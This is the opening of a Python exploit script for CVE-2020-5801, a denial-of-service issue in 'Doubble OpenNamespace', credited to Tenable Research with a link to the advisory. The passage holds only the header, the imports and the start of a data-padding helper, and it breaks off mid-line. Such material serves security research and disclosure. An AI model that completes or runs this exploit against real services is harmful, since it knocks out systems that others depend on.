## # Exploit Title: Doubble OpenNamespace Denial of Service # Date: 12/28/2020 # Exploit Author: Tenable Research # CVE : CVE-2020-5801 # Advisory: https://www.tenable.com/security/research/tra-2020-71 ## import sys, socket, argparse, struct import re, random, hexdump def block(data, pad=False): dlen = len(data) if (pad and dlen % 4): data += b'\x00' * (4 - dlen % 4) return struct.pack('